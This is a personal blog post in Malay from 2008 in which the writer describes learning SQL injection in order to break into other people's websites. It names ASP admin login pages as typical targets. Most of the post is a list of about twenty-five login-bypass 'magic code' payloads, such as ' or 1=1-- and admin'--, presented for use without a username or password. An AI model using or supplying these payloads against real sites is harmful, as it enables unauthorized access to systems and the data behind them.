SQL Injection.... 11/02/08 - 15/02/08

Today, aku belajar pasal SQL injection..apa tu? ia adalah salah satu cara nak hack @ ceroboh web org..cara nak guna nye kena pakai magic word..bunyi macam best kan? yelah, sebelum ni duk teruja dengar org blh hack web..So, sekarang aku sendiri pun boleh jadi hacker...hehehe..tapi xla terer sgt pun..tahap atas pegawai la kiranya..

What is SQL Injection?
- SQL injection digunakan untuk hack or ceroboh. Sebenarnya SQL injection terjadi ketika attacker memasukkan beberapa SQL statement ke 'query' dengan cara manipulasi data input ke applikasi tsb. -Ia kod untuk pecah masuk sesuatu system atau website yang mempunyai kata laluan.
- Biasanya Sql Injection dilakukan pada login page pada asp seperti di : admin\login.asp login.asp

* Code yang mana kita gunakan untuk ceroboh vulnerable system -> attack system yang lemah.

Magic Code
Magic code adalah salah satu code untuk menceroboh website org lain tanpa username dan password..Salah satu contoh magic code:

1' or '1'='1

ada byk magic code yg boleh digunakan untuk SQL injection.di bwh ini ada senarai mgic code yg boleh digunakan..

‘or 1=1–

‘or 0=0 –

‘or ‘x’='x

‘or a=a-

“or 0=0 –

“or 0=0 #

“or “x”=”x

“)or(”a”=”a

admin’–

hi” or 1=1 –

hi’ or’a'=’a

hi”)or(”a”=”a

or 0=0 #

‘or a=a–

‘or 0=0 #

‘having 1=1–

“or 1=1–

“or “a”=”a

‘)or(’a'=’a

‘)or(’x'=’x

hi” or “a”=”a

hi’ or 1=1 –

hi’)or(’a'=’a

or 0=0 –

or 1=1–